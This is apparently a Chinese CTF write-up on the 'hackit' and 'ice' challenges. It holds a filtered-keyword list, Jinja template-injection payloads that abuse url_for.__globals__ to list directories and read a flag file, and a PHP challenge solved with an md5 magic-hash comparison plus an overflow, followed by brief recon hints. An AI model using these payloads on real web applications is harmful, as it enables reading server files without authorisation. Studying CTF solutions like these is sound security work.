hackit&icewp

hackit 就看了一道题 又一道py沙盒。。。

hackit

之所以想记录下是因为用到了 tokyo上的 url_for

fuzz过滤了

1
["[","]","config","self","from_pyfile","|","join","mro","class","request","pop","attr","args","+"]
1
2
3
{{url_for.__globals__.__getitem__('os').listdir('./')}}
{{url_for.__globals__.__getitem__('__builtins__').__getitem__('open')('flag_secret_file_910230912900891283').read()}}

或者

1
{{url_for.__globals__.send_file('/opt/app/flag_secret_file_910230912900891283').response.text}}

参考
https://ctftime.org/writeup/11002
https://graneed.hatenablog.com/entry/2018/09/10/180318

好吧再补一道

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
include 'flag.php';
$username = substr($_GET['u'],0,25);
$password = substr($_GET['p'],0,45);
echo "Hello <b>Baby:</b><br>You may need <a href=\"/?source\">this</a> and/or <a href=\"/auth.so\">this</a><br>";
if (isset($_GET['source'])){
show_source(__FILE__);
}
$digest = @auth($username,$password);
if (md5($username) == md5($digest) and $digest !== $username){
echo "you are a good boy here is your flag : <b>$flag</b>";
}
else {
echo "you are not a good boy so no flag for you :(";
}

$digest = @auth($username,$password); 不知道

还给了so 又得逆。。 但可以较快看出一个溢出 不用全逆

所以 md5漏洞 但加个溢出 暴力尝试直到

?u=240610708&p=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA240610708

ice

web 很简单

1

https御剑可以扫

robots.txt

2

css里

3

随便访问个不存在页面

4

cookies

jwt解开